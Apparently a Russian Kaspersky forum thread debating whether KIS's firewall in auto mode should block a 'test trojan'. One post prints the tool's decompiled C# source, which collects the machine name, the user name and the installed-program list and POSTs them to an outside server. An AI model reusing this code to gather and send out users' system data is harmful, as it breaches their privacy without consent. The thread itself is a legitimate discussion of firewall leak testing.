Перейти к содержанию

Уязвимость файрвола Касперского?


Рекомендуемые сообщения

Мда.....

 

post-3402-1274733607_thumb.png

 

Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос?

Изменено пользователем SLASH_id
Ссылка на комментарий
Поделиться на другие сайты

  • Ответов 113
  • Создана
  • Последний ответ

Топ авторов темы

  • apq

    37

  • Gangster

    24

  • Самогонщик

    7

  • пользователь

    7

Что опасного в этой программе, почему она должна детектироваться? Вы скачали её и запустили целеустремленно на компьютере, к которому у вас есть доступ, а как вы её на моем запустите?

Ссылка на комментарий
Поделиться на другие сайты

Но если НАПИСАНО что "Запрос действия" то где запрос?

это судя по всему работает только в неавторежиме. надо у Данилки переспросить

Ссылка на комментарий
Поделиться на другие сайты

Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос?

Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке!

Запросы действия в блонди-моде интерпретируются как "разрешить".

 

 

Песец... прога на C# написана. Код:

Раскрывающийся текст:

private void MainForm_Load(object sender, EventArgs e)
{
   StringBuilder builder = new StringBuilder();
   try
   {
       builder.AppendFormat("<h1>Информация, полученная от проверочного трояна</h1><b>Загружено:</b> {2}<br/><b>Компьютер:</b> {0}<br/><b>Пользователь:</b> {1}<br/><br/><h2>Установленные программы:</h2><blockquote style=\"width: 700px; height: 500px; overflow: scroll\">", Environment.MachineName, Environment.UserName, DateTime.Now.ToString());
       RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall");
       foreach (string str in key.GetSubKeyNames())
       {
           try
           {
               RegistryKey key2 = key.OpenSubKey(str);
               object obj2 = key2.GetValue("DisplayName");
               object obj3 = key2.GetValue("DisplayVersion");
               if ((obj2 != null) && (obj2.ToString().Trim() != ""))
               {
                   string str2 = string.Format("<b>{0}</b> {1}<br/>", obj2.ToString(), (obj3 == null) ? "" : ("(" + obj3.ToString() + ")"));
                   builder.Append(str2);
               }
               key2.Close();
           }
           catch (Exception exception)
           {
               builder.Append(exception.ToString());
           }
       }
       key.Close();
       builder.Append("</blockquote>");
   }
   catch (Exception exception2)
   {
       builder.Append(exception2.ToString());
   }
   try
   {
       string str3 = Guid.NewGuid().ToString("N");
       string str4 = string.Format("session={0}&info={1}", str3, HttpUtility.UrlEncode(builder.ToString()));
       WebRequest request = WebRequest.Create("http://www.goodware.ru/trojan/upload.php");
       request.Method = "POST";
       request.ContentType = "application/x-www-form-urlencoded";
       request.ContentLength = str4.Length;
       StreamWriter writer = new StreamWriter(request.GetRequestStream());
       writer.Write(str4);
       writer.Close();
       using (StreamReader reader = new StreamReader(request.GetResponse().GetResponseStream()))
       {
           reader.ReadToEnd();
           this.UpdateResult(string.Format("http://www.goodware.ru/trojan/check.php?session={0}", str3), "Информация об установленных на Вашем компьютере программах была успешно собрана и беспрепятственно отправлена на наш сайт. Вы можете посмотреть ее по этой ссылке:\n\n{0}\n\nДанная информация будет доступна по этой ссылке в течении суток, затем она удаляется с сайта.");
       }
   }
   catch (Exception exception3)
   {
       this.UpdateResult("http://www.goodware.ru/trojan/", string.Format("Информация об установленных на Вашем компьютере программах была успешно собрана, но при отправке произошла ошибка:\n\n{0}\n\nВозможно, но не обязательно, это связано с успешной работой антивирусной программы или фаервола.\nВы можете свой оставить отзыв по этой ссылке:\n\n{{0}}\n\nНапишите текст ошибки и какой программой для защиты Вы пользуетесь. Возможно, это поможет другим.", exception3.Message));
   }
}

private void UpdateResult(string link, string text)
{
   this._linkUrl = link;
   this.lnkResult.Text = string.Format(text, link);
   this.lnkResult.LinkArea = new LinkArea(this.lnkResult.Text.IndexOf(link), link.Length);
}

private void lnkResult_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
{
   Process.Start(this._linkUrl);
}

 

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall - вот где прога шарится до смерти просто. В этой ветке нет личной информации пользователя - только список софта на машине. С чего бы вдруг ПДМу это блочить?

//Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить.

Изменено пользователем AgentMC
Ссылка на комментарий
Поделиться на другие сайты

//Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить.

Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.

Ссылка на комментарий
Поделиться на другие сайты

Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.

а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений?

Ссылка на комментарий
Поделиться на другие сайты

а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений?

Не все. Далеко не все.

Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.

 

А ведь этот пример идеально повторяет этот "тест".

Ссылка на комментарий
Поделиться на другие сайты

могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.

 

А ведь этот пример идеально повторяет этот "тест".

KIS выдаст алерт и вы сами разрешите действие программе, это не проблема...

Ссылка на комментарий
Поделиться на другие сайты

Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке!

Запросы действия в блонди-моде интерпретируются как "разрешить".

 

Это понятно)) Возникло предложение к следующей версии продукта, вместо кружочков с вопросами, и подобных типа запрет или наследование отрисовывать кружочек с буковкой "А" если включен авторежим.

А то третьеклассник-чайник посмотрит - ага, стоит запрос и будет возмущаться чего ж не спрашивает. Тем более при установке КИСа не спрашивает режим, а ставит автоматику по дефолту.

Ссылка на комментарий
Поделиться на другие сайты

Возникло предложение
Вроде внимательно смотрел... не нашёл :)
Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.
Во втором часу ночи формулировка свелась уже к "если прога из Сл.Огр. читает более 40 ключей реестрав разных ветках, а затем пытается отослать информацию в виде единого ПОСТ-запроса по хттп независимо от порта" -> ... :)
Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.
На спецсофт есть админ, который в курсе, что такое интерактив. Изменено пользователем AgentMC
Ссылка на комментарий
Поделиться на другие сайты

Я бы слегка расстроился, если у него не получилось.
А уж как расстроится бухгалтерия когда их инфо-система с последними редакциями указявок от правительства не запустится......

 

На спецсофт есть админ, который в курсе,
На спец-софт - есть не только админ - но и корпоративка :)
Ссылка на комментарий
Поделиться на другие сайты

KIS выдаст алерт и вы сами разрешите действие программе, это не проблема...

Это ваше право - настройте соответственно.

Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным.

 

Только не говорите мне, что домушники могут таким образом собирать сведения о компьютерах, чтобы планировать свои кражи - я смеяться буду.

 

На спецсофт есть админ, который в курсе, что такое интерактив.

А если это домашний софт? Например, игра подобно сталкеру, использующая технологию старфорса "резервная копия"?

Изменено пользователем пользователь
Ссылка на комментарий
Поделиться на другие сайты

Это ваше право - настройте соответственно.

то есть включить интерактивный режим? аиесли я хочу принимать решения только по сетевой активности?

Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным.

заметьте, вы сами пишете что имхо. ваше право так считать. а я например считаю, что любой софт без моего ведома не должен собирать какую либо информацию с моего ПК и передавать ее куда-то?

вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее

Ссылка на комментарий
Поделиться на другие сайты

вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее

Да без проблем

Включается интерактивный режим - все что на автомат - ставите или разрешить или запретить. А что нужно - Вопр.знак

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • KL FC Bot
      Автор KL FC Bot
      В мартовском вторничном патче компания Microsoft закрыла целых шесть уязвимостей, которые активно эксплуатируются злоумышленниками. Четыре из этих уязвимостей связаны с файловыми системами, причем три из них имеют одинаковый триггер, что может указывать на их использование в одной атаке. Детали их эксплуатации пока (к счастью) неизвестны, однако свежее обновление крайне рекомендуется к немедленной установке.
      Уязвимости в файловых системах
      Две из уязвимостей в системе NTFS позволяют злоумышленникам получить доступ к частям кучи (heap), то есть к динамически распределяемой памяти приложений. Что интересно, первая из них, CVE-2025-24984 (4,6 по шкале CVSS) подразумевает физический доступ злоумышленника к атакуемому компьютеру (он должен вставить в USB-порт подготовленный вредоносный накопитель). Для эксплуатации второй уязвимости типа Information Disclosure Vulnerability, CVE-2025-24991 (CVSS 5,5), злоумышленникам необходимо каким-то образом заставить локального пользователя подключить вредоносный виртуальный жесткий диск (VHD).
      Точно также активизируются и две другие уязвимости, связанные с файловыми системами CVE-2025-24985, в драйвере файловой системы Fast FAT и CVE-2025-24993 в NTFS. Вот только их эксплуатация приводит к удаленному запуску произвольного кода на атакуемой машине (RCE). У обеих уязвимостей CVSS рейтинг составляет 7,8.
       
      View the full article
    • KL FC Bot
      Автор KL FC Bot
      Интересную атаку, точнее, сразу две атаки с использованием двух разных уязвимостей в процессорах Apple, недавно продемонстрировали исследователи из университетов Германии и США. Представьте себе, что кто-то присылает вам ссылку в чате. Вы открываете ее, и там на первый взгляд нет ничего подозрительного. Никто не просит ввести ваш пароль от рабочей почты, не предлагает скачать сомнительный файл. Возможно, на странице даже есть что-то полезное или интересное. Но пока вы это полезное просматриваете, скрытый код читает информацию из соседней вкладки браузера и таким образом узнает, где вы находитесь в данный момент, что вы в последний раз покупали в популярном интернет-магазине, или, например, похищает текст электронного письма.
      Описание атаки выглядит достаточно просто, но на самом деле речь идет о сложнейшей атаке, эксплуатирующей особенности так называемого спекулятивного выполнения инструкций процессором.
      Подождите, но мы это уже где-то слышали!
      Действительно, по своему принципу новые атаки напоминают различные варианты атак типа Spectre, эксплуатирующих другие, хотя отчасти похожие уязвимости в процессорах Intel и AMD. Мы писали об этих атаках раньше: в 2022 году, через 4 года после обнаружения самой первой уязвимости Spectre, мы пришли к выводу, что реального, простого и действенного метода эксплуатации этих уязвимостей нет. Использовать свежеобнаруженные проблемы в чипах Apple также непросто, но есть важное отличие: исследователи в новой работе сразу предлагают достаточно реалистичные варианты атак и доказывают их возможность. Чтобы разобраться, насколько опасны данные уязвимости, давайте коротко, и не вдаваясь в дебри сложного научного исследования, повторим основные принципы всех подобных атак.
       
      View the full article
    • KL FC Bot
      Автор KL FC Bot
      В популярном архиваторе 7-Zip была обнаружена уязвимость CVE-2025-0411, позволяющая злоумышленникам обходить защитный механизм Mark-of-the-Web. CVE-2025-0411 имеет рейтинг 7.0 по шкале CVSS. Уязвимость была оперативно исправлена, однако, поскольку в программе отсутствует механизм автоматического обновления, у некоторых пользователей могла остаться уязвимая версия. В связи с чем мы рекомендуем незамедлительно обновить архиватор.
      Что такое Mark-of-the-Web?
      Механизм Mark-of-the-Web (MOTW) заключается в проставлении специальной отметки в метаданных файлов, полученных из Интернета. При наличии такой отметки операционная система Windows считает такой файл потенциально опасным. Соответственно, если файл исполняемый, то при попытке его запуска пользователь увидит предупреждение о том, что он может причинить вред. Кроме того, ряд программ ограничивают функциональность файла (например, офисные приложения блокируют выполнение макросов). Подразумевается, что если из Интернета скачан архив, то при его распаковке все находившиеся внутри файлы также унаследуют отметку MOTW.
      Злоумышленники неоднократно были замечены за попытками избавиться от отметки MOTW для того, чтобы ввести пользователя в заблуждение. В частности, несколько лет назад мы писали о том, как это делает группировка BlueNoroff. По классификации матрицы MITRE ATT&CK обход механизма MOTW относится к подтехнике T1553.005: Subvert Trust Controls: Mark-of-the-Web Bypass.
       
      View the full article
    • KL FC Bot
      Автор KL FC Bot
      Представьте: встаете вы ночью попить водички, идете по неосвещенному коридору, и тут из темноты на вас кто-то начинает громко орать. Ситуация, согласитесь, крайне неприятная. И в нее вполне можно попасть по вине уязвимого робота-пылесоса — взломщики могут заставить самобеглую железку по их команде накричать на хозяина. Но это еще не все: хакеры могут управлять роботом удаленно и включать с него живые трансляции.
      И это совсем не теоретическая опасность: не так давно случаи, когда сетевые хулиганы использовали уязвимые роботы-пылесосы для того, чтобы портить жизнь людям, были зафиксированы, что называется, в дикой природе. Рассказываем обо всем по порядку.
      Как устроен робот-пылесос
      Начнем с того, что современный робот-пылесос — это полноценный компьютер на колесиках, работающий под управлением Linux. У него есть мощный многоядерный процессор ARM, солидный объем оперативной памяти, вместительный флеш-накопитель, Wi-Fi и Bluetooth.
      Любой современный робот-пылесос — это полноценный компьютер на колесиках. Источник
       
      View the full article
    • Yaasa
      Автор Yaasa
      сидел в компе и касперский начал часто выдавать сообщение запрещено при заходе в антивирус это :
      ложное ли это срабатывание или вирус?
       



×
×
  • Создать...